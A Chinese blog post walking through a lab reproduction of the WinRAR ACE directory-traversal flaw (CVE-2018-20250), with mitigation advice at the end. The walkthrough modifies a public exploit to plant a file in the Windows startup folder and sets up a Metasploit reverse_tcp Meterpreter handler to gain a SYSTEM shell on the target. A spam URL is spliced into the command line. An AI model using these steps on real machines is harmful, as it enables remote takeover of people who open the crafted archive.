zoukankan      html  css  js  c++  java
  • WinRAR目录穿越漏洞

     该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行

    漏洞编号:CVE-2018-20250

    影响版本:

        WinRAR < 5.70 Beta 1

        Bandizip < = 6.2.0.0

        好压(2345压缩) < = 5.9.8.10907

        360压缩 < = 4.0.0.1170

    复现环境

    exp下载:

    https://github.com/WyAtu/CVE-2018-20250/

    复现过程

    1.使用Metasploit生成Payload

    2.使用exp生成恶意程序

    cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py

    将exp.py中的evil_filename = “calc.exe”改为”WinRAR.exe”

    将CVE-2018-20250文件夹复制到Windows10中执行 

    3.在靶机上运行恶意程序

    将test.rar 投放到win8上 解压运行

    4.在kali上监听metasploit

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com

    5.控制靶机

    Win8重启之后 kali会接受到会话 此时执行shell

    进入到win8系统的system权限

    漏洞防御

    1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御

    2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1

    3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本

  • 相关阅读:
    微信小程序scroll-view不动的处理
    AndoridSQLite数据库开发基础教程(4)
    Andorid SQLite数据库开发基础教程(3)
    Andorid SQLite数据库开发基础教程(2)
    Visual Studio 2019更新到16.2.3
    密码的复杂化#个人隐私保护系列#
    Nessus更新到8.6.0
    Visual Studio 2019更新到16.2.2
    Maltego更新到4.2.6
    Visual Studio 2019更新到16.2.1
  • 原文地址:https://www.cnblogs.com/gendan5/p/11532104.html
Copyright © 2011-2022 走看看